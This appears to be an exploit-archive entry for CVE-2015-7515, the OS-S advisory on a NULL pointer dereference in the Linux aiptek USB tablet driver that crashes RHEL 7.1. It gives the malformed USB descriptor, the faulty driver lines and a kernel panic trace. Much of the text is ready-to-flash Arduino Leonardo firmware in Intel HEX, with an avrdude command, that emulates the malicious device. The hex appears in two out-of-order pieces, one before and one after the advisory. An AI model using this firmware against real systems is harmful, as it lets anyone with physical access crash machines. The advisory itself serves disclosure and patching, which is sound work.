:1006100080938000089584B58F7702C084B58F7D64
:1006200084BD0895809190008F7707C080919000DD
:100630008F7D03C080919000877F80939000089504
:100640008091C0008F7703C08091C0008F7D809320
:10065000C00008958091C200877F8093C2000895F2
:10066000CF93DF9390E0FC01EA51FF4F2491FC010E
:10067000EC5FFE4F8491882349F190E0880F991F29
:10068000FC01E25CFE4FA591B491805D9E4FFC01A0
:10069000C591D4919FB7611108C0F8948C912095B1
:1006A00082238C93888182230AC0623051F4F894AB
:1006B0008C91322F309583238C938881822B888371
:1006C00004C0F8948C91822B8C939FBFDF91CF91C3
:1006D00008950F931F93CF93DF931F92CDB7DEB78B
:1006E000282F30E0F901E853FF4F8491F901EA51D6
:1006F000FF4F1491F901EC5FFE4F04910023C9F004
:10070000882321F069830E94F7026981E02FF0E0DD
:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7
:100720008C91611103C01095812301C0812B8C93A2
:100730009FBF0F90DF91CF911F910F910895CF939D
:10074000DF93282F30E0F901E853FF4F8491F9013E
:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5
:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5
:10077000EE5DFE4FA591B4912C912D2381E090E088
:1007800021F480E002C080E090E0DF91CF910895F5
:10079000615030F02091F100FC0120830196F8CFE8
:1007A000289884E680937D0508951092E9001092C0
:1007B00071051092700590936F0580936E050895F2
:1007C000FF920F931F93CF93DF93F82E8B01EA01D3
:1007D000BA01C8010E94A606F80120E030E08EEFC1
:1007E0002C173D0791F1F7FE02C0A49101C0A08132
:1007F000609170057091710540916E0550916F0583
:1008000064177507ACF49091E8009570E1F390914E
:10081000E80092FD1CC0A093F100A0917005B0917A
:1008200071051196AF73BB27AB2B11F48093E800D1
:10083000A0917005B09171051196B0937105A093C8
:1008400070052F5F3F4F3196CBCFC90102C08FEFAC
:100850009FEFDF91CF911F910F91FF9008951F920D
:100860000F920FB60F9211246F927F928F929F92E8
:10087000AF92BF92CF92DF92EF92FF920F931F93AE
:100880002F933F934F935F936F937F938F939F9398
:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3
:1008A0006297DEBFCDBF1092E9008091E80083FF20
:1008B00046C168E0CE010A960E94C80382EF809389
:1008C000E8009A8597FF05C08091E80080FFFCCF83
:1008D00003C08EEF8093E800892F807609F023C152
:1008E0008B85811105C01092F1001092F10020C19A
:1008F000282F2D7F213009F41BC1853049F48091C8
:10090000E80080FFFCCF8C8580688093E30010C1F5
:10091000863009F0E1C02D8508891989223009F057
:10092000B3C0EC848E2D90E0209173053091740556
:10093000821793070CF09FC00E94D5031F92EF927D
:100940008DE394E09F938F930E9483068CE0E89E52
:1009500070011124E0917505F0917605EE0DFF1DF3
:1009600089E0DE01119601900D928A95E1F7C801A8
:100970000E94D50349E050E0BE016F5F7F4F80E0E9
:100980000E94E0030F900F900F900F90C12CD12C7C
:10099000612C712C33E7A32E34E0B32E4AEA842E67
:1009A00044E0942EE0917505F0917605EE0DFF1D63
:1009B000818590E0681679060CF0BAC07F926F923C
:1009C000BF92AF920E948306E0917505F091760583
:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5
:1009E00080E00E94E0030F900F900F900F9000E0C6
:1009F00010E0E0917505F0917605EE0DFF1D028483
:100A0000F385E02DEC0DFD1D818590E00817190799
:100A10005CF51F930F939F928F920E948306E09143
:100A20007505F0917605EE0DFF1D0284F385E02D2E
:100A3000EC0DFD1DC801880F991FA485B585A80F71
:100A4000B91F4D915C910284F385E02DE80FF91FE9
:100A50006081718180E00E94E0030F5F1F4F0F9063
:100A60000F900F900F90C5CF8FEF681A780A8EE025
:100A7000C80ED11C97CF8FED94E09F938F930E9467
:100A800083060F900F9058C0C8012A8B0E94D5038F
:100A90002A892130C1F0233009F04EC08C851F9285
:100AA0008F9389EF94E09F938F930E94830642E097
:100AB00050E062E871E080E00E94E0030F900F9048
:100AC0000F900F9035C04091000150E060E071E060
:100AD00080E00E94E0032CC0873071F1883021F45F
:100AE00081E08093F10024C0893011F5937021F5E5
:100AF000EDE4F1E081E021E096E38093E9002093CA
:100B0000EB0034913093EC009093ED008F5F3196C1
:100B1000843099F78EE78093EA001092EA008C8582
:100B20008093720505C0888999890E94D50304C005
:100B30008EEF8093E80003C081E28093EB00629621
:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE
:100B5000EF91BF91AF919F918F917F916F915F9135
:100B60004F913F912F911F910F91FF90EF90DF9048
:100B7000CF90BF90AF909F908F907F906F900F908D
:100B80000FBE0F901F9018951F920F920FB60F92E5
:100B900011248F939F938091E1001092E10083FFD5
:100BA0000FC01092E90091E09093EB001092EC00DE
:100BB00092E39093ED001092720598E09093F0000C
:100BC00082FF1AC080917E05882339F080917E05CE
:100BD000815080937E05882369F080917D0588236C
:100BE00059F080917D05815080937D05811104C06D
:100BF000289A02C05D9AF1CF9F918F910F900FBEFE
:100C00000F901F901895CF93DF93CDB7DEB782E199
:100C1000FE013596A0E0B1E001900D928A95E1F7D2
:100C20008F89988D9093760580937505898D9A8D1F
:100C300090937405809373058B8D9C8D90937C05A8
:100C400080937B058D8D9E8D90937A058093790599
:100C50008F8D98A1909378058093770510927205F7
:100C600081E08093D70080EA8093D80082E189BD3B
:100C700009B400FEFDCF61E070E080E090E00E94EA
:100C80007B0280E98093D8008CE08093E200109290
:100C9000E000559A209ADF91CF91089581E08093EA
:100CA000E00008959091C80095FFFCCF8093CE009E
:100CB00008951092CD0087E68093CC0088E1809360
:100CC000C9008EE08093CA0008950F931F93CF93BD
:100CD000DF93EC018C01FE0101900020E9F73197D0
:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E
:100CF000F80181918F010E945206EDCFDF91CF91D3
:100D00001F910F910895CF93DF93CDB7DEB7DA959A
:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6
:100D2000419151919F0160E071E0CE0101960E94D6
:100D30000707CE0101960E946506D3950FB6F89479
:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE
:100D5000AF92BF92CF92DF92EF92FF920F931F93C9
:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E
:100D70003F932F9389839A830E9483068981882ECB
:100D80009A81992E0F900F9000E010E08EE5E82EEA
:100D900085E0F82E91E1C92E94E0D92E0A151B05A5
:100DA000E4F4F40181914F0190E09F938F93FF92BF
:100DB000EF920E9483060F5F1F4FC8018F70992723
:100DC0000F900F900F900F90892B41F7DF92CF92E9
:100DD0000E9483060F900F90E1CF81E194E09F93F2
:100DE0008F930E9483060F900F900F900F90DF91CA
:100DF000CF911F910F91FF90EF90DF90CF90BF9018
:100E0000AF909F908F900895F8940C94E809AEE00D
:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8
:100E20004C831A83098377FF02C060E070E8615049
:100E300071097E836D83A901BC01CE0101960E94D8
:100E400033074D815E8157FD0AC02F8138854217D7
:100E500053070CF49A01F801E20FF31F10822E964B
:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB
:100E7000B1097C016B018A01FC0117821682838112
:100E800081FFBDC1CE0101964C01F7019381F601AE
:100E900093FD859193FF81916F01882309F4ABC184
:100EA000853239F493FD859193FF81916F018532ED
:100EB00029F4B70190E00E941B09E7CF512C312C97
:100EC00020E02032A0F48B3269F030F4803259F007
:100ED000833269F420612CC08D3239F0803339F4CB
:100EE000216026C02260246023C0286021C027FD25
:100EF00027C030ED380F3A3078F426FF06C0FAE00C
:100F00005F9E300D1124532E13C08AE0389E300DA1
:100F10001124332E20620CC08E3221F426FD6BC1C9
:100F2000206406C08C3611F4206802C0883641F473
:100F3000F60193FD859193FF81916F018111C1CFDE
:100F4000982F9F7D9554933028F40C5F1F4FFFE33B
:100F5000F9830DC0833631F0833771F0833509F0A2
:100F60005BC022C0F801808189830E5F1F4F44243B
:100F70004394512C540115C03801F2E06F0E711CDE
:100F8000F801A080B18026FF03C0652D70E002C08B
:100F90006FEF7FEFC5012C870E9410092C018301A0
:100FA0002C852F77222E17C03801F2E06F0E711CAE
:100FB000F801A080B18026FF03C0652D70E002C05B
:100FC0006FEF7FEFC5012C870E9405092C012C854E
:100FD0002068222E830123FC1BC0832D90E048163D
:100FE0005906B0F4B70180E290E00E941B093A94E0
:100FF000F4CFF50127FC859127FE81915F01B701B0
:1010000090E00E941B0931103A94F1E04F1A510808
:101010004114510471F7E5C0843611F0893639F571
:10102000F80127FF07C060817181828193810C5F85
:101030001F4F08C060817181882777FD8095982FA8
:101040000E5F1F4F2F76B22E97FF09C090958095A7
:10105000709561957F4F8F4F9F4F2068B22E2AE089
:1010600030E0A4010E944D09A82EA81844C085377D
:1010700029F42F7EB22E2AE030E025C0F22FF97F2E
:10108000BF2E8F36C1F018F4883579F0B4C08037A0
:1010900019F0883721F0AFC02F2F2061B22EB4FE97
:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D
:1010B0009660B92E06C028E030E005C020E130E09F
:1010C00002C020E132E0F801B7FE07C06081718103
:1010D000828193810C5F1F4F06C06081718180E027
:1010E00090E00E5F1F4FA4010E944D09A82EA81882
:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428
:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0
:101110007A2C2B2D03C07A2C01C0752C24FF0DC016
:10112000FE01EA0DF11D8081803311F4297E09C092
:1011300022FF06C07394739404C0822F867809F04E
:10114000739423FD13C020FF06C05A2C731418F4A7
:10115000530C5718732C731468F4B70180E290E0B5
:101160002C870E941B0973942C85F5CF731410F4FF
:10117000371801C0312C24FF12C0B70180E390E082
:101180002C870E941B092C8522FF17C021FF03C05A
:1011900088E590E002C088E790E0B7010CC0822F9C
:1011A000867859F021FD02C080E201C08BE227FD64
:1011B0008DE2B70190E00E941B09A51438F4B70135
:1011C00080E390E00E941B095A94F7CFAA94F4019F
:1011D000EA0DF11D8081B70190E00E941B09A1106A
:1011E000F5CF332009F451CEB70180E290E00E94A0
:1011F0001B093A94F6CFF7018681978102C08FEFE1
:101200009FEF2C96E2E10C94CD09FC010590615012
:1012100070400110D8F7809590958E0F9F1F08950C
:10122000FC016150704001900110D8F780959095B5
:101230008E0F9F1F08950F931F93CF93DF93182F47
:10124000092FEB018B8181FD03C08FEF9FEF20C041
:1012500082FF10C04E815F812C813D814217530770
:101260007CF4E881F9819F012F5F3F4F3983288308
:10127000108306C0E885F985812F0995892B29F708
:101280002E813F812F5F3F4F3F832E83812F902FF1
:10129000DF91CF911F910F910895FA01AA2728306D
:1012A00051F1203181F1E8946F936E7F6E5F7F4F33
:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF
:1012C000781F891F9A1FA11D680F791F8A1F911D02
:1012D000A11D6A0F711D811D911DA11D20D009F452
:1012E00068943F912AE0269F11243019305D319394
:1012F000DEF6CF010895462F4770405D4193B3E07D
:101300000FD0C9F7F6CF462F4F70405D4A3318F023
:10131000495D31FD4052419302D0A9F7EACFB4E0D4
:10132000A6959795879577956795BA95C9F700978C
:101330006105710508959B01AC010A2E069457952D
:10134000479537952795BA95C9F7620F731F841F84
:10135000951FA01D0895EE0FFF1F0590F491E02D3D
:1013600009942F923F924F925F926F927F928F9249
:101370009F92AF92BF92CF92DF92EF92FF920F9324
:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E
:10139000F894DEBF0FBECDBF09942A8839884888EB
:1013A0005F846E847D848C849B84AA84B984C88481
:1013B000DF80EE80FD800C811B81AA81B981CE0F78
:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D
:0413D000F894FFCFBF
:1013D4001201000200000040AD0BEFBE000101024B
:1013E4000001220342006100640020004200410029
:1013F40042004500250078002500780025006E0095
:1014040025007000180342004100440020004300FE
:10141400300046004600450045002100120100024C
:1014240000000040820403020001010203010902DA
:10143400270001010000FA0705810304040C0705D5
:10144400010204000C0705820104000C07000700D8
:101454000700480100500072006F006C00690066CC
:101464000069006300000A550000006BFD180A00C3
:10147400809F0AB901312B940A8101128946001315
:10148400000257028B0A5E0AF80A5F01F212010099
:1014940002010000400D055702000101020301B9D9
:1014A4000A0100F80A5F0A810A220342006100640B
:1014B400002000420041004200450025007800253C
:1014C40000780025006E00250070001803420041DA
:1014D400004400200043003000460046004500451B
:1014E40000210012010002010000400D0557020016
:1014F400010102030109040000030100000003F2DA
:101504000AEC0A0902270001010000FA01AB0A09EA
:101514000400000301000000090200202020202014
:101524005F5F5F5F5F5F5F5F2020202020202020BF
:1015340020202020202020202020202020202020A7
:1015440020205F5F5F5F5F205F5F20205F2020209F
:101554002020205F5F0A0D00202020202F205F5FC5
:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3
:101574005F5F20205F5F5F5F5F20202020202F209F
:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3
:10159400202F5F5F0A0D002020202F202F202020E5
:1015A4002F205F5F205C2F205F5F20602F205F5F14
:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A
:1015C400205C2F205F5F2F202F205F5F5F2F202F55
:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009
:1015E4002F202F202F202F5F2F202F202F5F2F2001
:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0
:101604002F202F5F2F202F202F5F5F2F202C3C0AAD
:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07
:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F
:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4
:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044
:101654003C3C2043485241534820414E59204F506E
:1016640045524154494E472053595354454D203E09
:101674003E0A0D00203C3C202863292053657267F4
:10168400656A20536368756D696C6F20323031353B
:101694002C204F70656E536F7572636520536563BC
:1016A40075726974792052616C66205370656E6E30
:1016B4006562657267203E3E0A0D000A3E3E205078
:1016C4007265737320627574746F6E20746F207307
:1016D4007461727420657865637574696F6E2E2EFB
:1016E4002E0A0D005B44454255475D2045786563ED
:1016F400757465207061796C6F616420300A0D0027
:10170400526563762D446174613A0A0D005B444569
:101714004255475D200953656E6420436F6E6669C8
:101724006775726174696F6E44657363726970740E
:101734006F720928696E6465783A2569292E2E2E00
:101744000D0A005B44454255475D200953656E64AC
:1017540020496E74657266616365204465736372C3
:101764006970746F720928696E7465726661636565
:101774003A2569292E2E2E0D0A005B444542554711
:101784005D200953656E6420456E64706F696E74E4
:101794002044657363726970746F720928656E649E
:1017A400706F696E743A2569292E2E2E0D0A005B1E
:1017B40044454255475D203C3C70616E6963206D31
:1017C4006F64653F3E3E0D0A005B44454255475DEC
:1017D4002009203E3E20537472696E67204465736D
:1017E40063726970746F72207265717565737420A9
:1017F4002D2073656E64696E67206D616C666F720F
:101804006D656420737472696E67212073657475E5
:10181400702E7756616C75654C203D3D2025690D11
:101824000A005B48455844554D505D0A0D0025306B
:041834003258200006
:00000001FF

614
platforms/linux/dos/39544.txt Executable file
View file

@ -0,0 +1,614 @@
OS-S Security Advisory 2016-05
Linux aiptek Nullpointer Dereference
Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: CVE-2015-7515
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
USB device descriptors (aiptek driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of Advisory: https://os-s.net/advisories/OSS-2016-05_aiptek.pdf
Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes when presented a buggy USB
device using the aiptek driver.
Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.
Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
(github.com/schumilo) using the following device descriptor:
[*] Device-Descriptor
bLength: 0x12
bDescriptorType: 0x1
bcdUSB: 0x200
bDeviceClass: 0x3
bDeviceSubClass: 0x0
bDeviceProtocol: 0x0
bMaxPacketSize: 0x40
idVendor: 0x458
idProduct: 0x5003
bcdDevice: 0x100
iManufacturer: 0x1
iProduct: 0x2
iSerialNumbers: 0x3
bNumConfigurations: 0x1
[*] Configuration-Descriptor
bLength: 0x9
bDescriptorType: 0x2
wTotalLength: 0x27
bNumInterfaces: 0x1
bConfigurationValue: 0x1
iConfiguration: 0x0
bmAttributes: 0x0
bMaxPower: 0x31
[*] Interface-Descriptor
bLength: 0x9
bDescriptorType: 0x4
bInterfaceNumber: 0x0
bAlternateSetting: 0x0
bNumEndpoints: 0x0
bInterfaceClass: 0x0
bInterfaceSubClass: 0x0
bInterfaceProtocol: 0x0
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x81
bmAttribut: 0x3
wMaxPacketSize: 0x404
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x1
bmAttribut: 0x2
wMaxPacketSize: 0x4
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x82
bmAttribut: 0x1
wMaxPacketSize: 0x4
bInterval: 0xc
The aiptek driver assumes that there will be at least one endpoint-descriptor.
If the interface-descriptor contains a zero-value for bNumEndpoints or no
endpoint-descriptor is provided, the driver tries to dereference a null-
pointer and the kernel crashes:
****
$ nm aiptek.ko.debug | grep aiptek_probe
0000000000001ea0 t aiptek_probe
$ addr2line -e aiptek.ko.debug 2303
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
64/drivers/input/tablet/aiptek.c:1830
****
**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/input/tablet/aiptek.c)
1822 endpoint = &intf->altsetting[0].endpoint[0].desc; /* Nullpointer */
1823
1824 /* Go set up our URB, which is called when the tablet receives
1825 * input.
1826 */
1827 usb_fill_int_urb(aiptek->urb,
1828 aiptek->usbdev,
1829 usb_rcvintpipe(aiptek->usbdev,
1830 endpoint->bEndpointAddress), /* Nullpointer-
Dereference */
1831 aiptek->data, 8, aiptek_irq, aiptek,
1832 endpoint->bInterval);
****
Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This
firmware will emulate the defective USB device.
avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
flash:w:binary.hex
The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to
connect port D3 and 3V3!
Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
only physical access to the system is required.
Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
A patch was provided on the November, 25th 2015.
References:
https://bugzilla.redhat.com/show_bug.cgi?id=1285326
https://bugzilla.redhat.com/show_bug.cgi?id=1283350
Kernel Stacktrace:
[ 622.149957] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 622.354485] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint
descriptors, different from the interface descriptor's value: 0
[ 622.386630] usb 1-1: New USB device found, idVendor=0458, idProduct=5003
[ 622.392414] usb 1-1: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[ 622.399416] usb 1-1: Product: Ä?
[ 622.404640] usb 1-1: Manufacturer: Ä?
[ 622.410079] usb 1-1: SerialNumber: %
[ 622.444650] BUG: unable to handle kernel NULL pointer dereference at
0000000000000002
[ 622.445019] IP: [<ffffffffa0395303>] aiptek_probe+0x463/0x658 [aiptek]
[ 622.445019] PGD 0
[ 622.445019] Oops: 0000 [#1] SMP
[ 622.445019] Modules linked in: aiptek(+) ip6t_rpfilter ip6t_REJECT
ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc
ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6
nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter
ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat
nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter
ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper
drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c
sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix
libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 622.445019] CPU: 0 PID: 2242 Comm: systemd-udevd Not tainted
3.10.0-229.14.1.el7.x86_64 #1
[ 622.445019] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 622.445019] task: ffff88000e65a220 ti: ffff88000f4cc000 task.ti: ffff88000f4cc000
[ 622.445019] RIP: 0010:[<ffffffffa0395303>] [<ffffffffa0395303>]
aiptek_probe+0x463/0x658 [aiptek]
[ 622.445019] RSP: 0018:ffff88000f4cfb80 EFLAGS: 00010286
[ 622.445019] RAX: 0000000000000000 RBX: ffff88000bd67800 RCX: ffff88000bcd0800
[ 622.445019] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffff88000ca29000
[ 622.445019] RBP: ffff88000f4cfbe0 R08: 0000000000000000 R09: 0000000000000000
[ 622.445019] R10: ffff88000e401400 R11: ffffffff810020d8 R12: ffff88000c525800
[ 622.445019] R13: ffff88000c525830 R14: ffff88000bcd1800 R15: ffff88000bd67834
[ 622.445019] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
knlGS:0000000000000000
[ 622.445019] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 622.445019] CR2: 0000000000000002 CR3: 000000000d67f000 CR4:
00000000000006f0
[ 622.445019] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 622.445019] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 622.445019] Stack:
[ 622.445019] ffff88000bcd0800 0000000000000001 0000019000000246
0000019000000032
[ 622.445019] 0000006400000019 0000012c000000c8 000000000cc3e092
ffff88000bcd0890
[ 622.445019] ffff88000bcd0800 ffffffffa0397068 ffff88000c525830 ffffffffa03965c0
[ 622.445019] Call Trace:
[ 622.445019] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 622.445019] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 622.445019] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 622.445019] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 622.445019] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 622.445019] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 622.445019] [<ffffffff813d2680>] bus_add_driver+0x200/0x2d0
[ 622.445019] [<ffffffff813d3b34>] driver_register+0x64/0xf0
[ 622.445019] [<ffffffff8141c1c2>] usb_register_driver+0x82/0x160
[ 622.445019] [<ffffffffa039a000>] ? 0xffffffffa0399fff
[ 622.445019] [<ffffffffa039a01e>] aiptek_driver_init+0x1e/0x1000 [aiptek]
[ 622.445019] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 622.445019] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 622.445019] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 622.445019] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 622.445019] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 622.445019] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 622.445019] Code: 45 31 c9 45 31 c0 b9 ff 03 00 00 be 08 00 00 00 4c 89 f7
e8 90 39 0d e1 49 8b 04 24 48 8b 4b 08 48 8b bb 10 01 00 00 48 8b 40 18 <0f>
b6 50 02 0f b6 70 06 8b 01 c1 e2 0f c1 e0 08 81 ca 80 00 00
[ 622.445019] RIP [<ffffffffa0395303>] aiptek_probe+0x463/0x658 [aiptek]
[ 622.445019] RSP <ffff88000f4cfb80>
[ 622.445019] CR2: 0000000000000002
[ 622.860772] ---[ end trace b239663354a1c556 ]---
[ 622.864813] Kernel panic - not syncing: Fatal exception
[ 622.865768] drm_kms_helper: panic occurred, switching back to text console
Arduino Leonardo Firmware:
:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C2050C942D04CE
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940C02C3
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C50009030C0306
:1000B000FF0203032D032D032D0310031403180364
:1000C0001E0322032D0328030000000200080E0077
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E0EDF3E102C005900D92A436B107D5
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9402070C940000089547
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E949F020E94C70060E06D
:1001B00083E00E942E0361E087E00E942E0361E04D
:1001C00088E00E942E030E9457067E012AE9E20E73
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93F90168
:1002C0009082E4E0D9011196EC93F901DC01292D2B
:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB
:1002E0001B96FC93EE931A971D96BC92AE921C97A8
:1002F0001183008373836283558344830C521109F5
:100300002CE0F80111922A95E9F721E0D80119961D
:100310002C931997FE01E059FF4F01900D929A948A
:10032000E1F7F8019387828761E088E00E94670324
:100330008BE492E00E94630688E892E00E946306E4
:1003400087EC92E00E94630686E093E00E946306D9
:1003500082E493E00E9463068FE793E00E946306C5
:1003600084EA93E00E9463068BEE93E00E946306AA
:1003700083E00E949D03892B09F047C05E01F3E2F0
:10038000AF0EB11C8824839482E1982E84E194E01E
:100390000E946306BF92AF92DF92CF92FF92EF92DC
:1003A0001F928F921F930F932DB73EB722513109A1
:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6
:1003C000FE01FB96892D01900D928A95E1F78DE64D
:1003D00095E00E94010668E873E180E090E00E94E9
:1003E00079028DE695E00E944C0660E087E00E946D
:1003F000670368E873E180E090E00E9479020FB63D
:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0
:1004100090E00E947902ACCF1F920F920FB60F921C
:1004200011242F933F938F939F93AF93BF9380910A
:10043000650590916605A0916705B09168053091BA
:10044000640523E0230F2D3720F40196A11DB11D73
:1004500005C026E8230F0296A11DB11D2093640557
:100460008093650590936605A0936705B093680532
:100470008091690590916A05A0916B05B0916C051A
:100480000196A11DB11D8093690590936A05A09303
:100490006B05B0936C05BF91AF919F918F913F9188
:1004A0002F910F900FBE0F901F9018953FB7F894A3
:1004B0008091690590916A05A0916B05B0916C05DA
:1004C00026B5A89B05C02F3F19F00196A11DB11DAF
:1004D0003FBF6627782F892F9A2F620F711D811DCC
:1004E000911D42E0660F771F881F991F4A95D1F72B
:1004F0000895CF92DF92EF92FF92CF93DF936B013B
:100500007C010E945602EB01C114D104E104F10404
:1005100079F00E9456026C1B7D0B683E7340A0F37D
:1005200081E0C81AD108E108F108C851DC4FECCFCE
:10053000DF91CF91FF90EF90DF90CF900895789466
:1005400084B5826084BD84B5816084BD85B58260D8
:1005500085BD85B5816085BDEEE6F0E08081816076
:100560008083E1E8F0E01082808182608083808176
:1005700081608083E0E8F0E0808181608083E1E950
:10058000F0E0808182608083808181608083E0E907
:10059000F0E0808181608083E1ECF0E08081846024
:1005A0008083808182608083808181608083E3ECAE
:1005B000F0E0808181608083E0ECF0E08081826007
:1005C0008083E2ECF0E0808181608083EAE7F0E004
:1005D000808184608083808182608083808181606B
:1005E0008083808180688083089590E0FC0131974A
:1005F000EE30F10590F5EA5AFF4F0C94A90980916D
:1006000080008F7703C0809180008F7D8093800071
:10061000089584B58F7702C084B58F7D84BD089519
:10062000809190008F7707C0809190008F7D03C0EC
:1006300080919000877F8093900008958091C00002
:100640008F7703C08091C0008F7D8093C000089594
:100650008091C200877F8093C2000895CF93DF937B
